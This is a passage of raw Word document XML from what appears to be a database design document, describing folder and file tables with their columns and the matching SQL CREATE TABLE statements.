            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17F54AB8"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imary Key, Unique identifier for folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="4D6FE661" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="105D6335"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lder_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69B39309"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ARCHAR(255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="291CB59C"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ame of the folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="13A51B98" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58E606BB"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arent_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9D1891"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UMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24C423FB"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eign Key referencing folder_id (for parent folder)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="14E456D4" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40204DAA"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reated_at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32505C7C"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IMESTAMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FF8BFD6"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reation timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16E3AD94"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ere’s the structure of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Folders</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8869A" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F92">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CRE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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> folders (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    folder_id </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="5C2699"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NUMBER</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PRIMARY </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    folder_name </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="5C2699"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="1C00CF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>255</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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NO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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    parent_id </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="5C2699"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NUMBER</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    created_at </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="5C2699"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TIMESTAMP</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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DEFAUL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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FOREIG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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (parent_id) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> folders(folder_id)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA07CC"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older_id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Uniquely identifies each folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286A137F"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older_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores the folder's name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087AC8AE"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parent_id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Refers to the folder_id of the parent folder, creating a hierarchy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69717102"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reated_at</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores the timestamp when the folder is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4009439A" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F9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2. Files Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7337AC"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This table stores the files and the folder in which they are stored. Each file can be associated with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specific folder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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72"/>
        <w:gridCol w:w="1401"/>
        <w:gridCol w:w="3814"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="4AC91C39" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="652B9B52" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="00275399">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Column Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54F290D3" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="00275399">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ata Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78AAC80A" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="00275399">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3B7F92" w:rsidRPr="00CE4B95" w14:paraId="0FF28838" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="204C8276"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le_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3235B4D8"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UMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5167A35A"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rimary Key, Unique identifier for file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="33503F59" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66607B9F"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ile_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E737435"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ARCHAR(255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E3DC8E1"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ame of the file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="26DEA3F1" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="289B0A7B"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lder_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EEDDFA8"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UMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66AA1B1A"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reign Key referencing folders(folder_id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="2878F8F0" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="464412D1"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reated_at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C92B398"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IMESTAMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="630095A0"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reation timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43F2D28C"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Here’s the structure of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6C9646" w14:textId="77777777" w:rsidR="000A0B7D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A0B7D" w:rsidP="000A0B7D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> files (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    file_id </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="5C2699"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NUMBER</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PRIMARY </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    file_name </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="5C2699"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="1C00CF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>255</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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NO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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    folder_id </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="5C2699"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NUMBER</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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NO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AA0D91"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
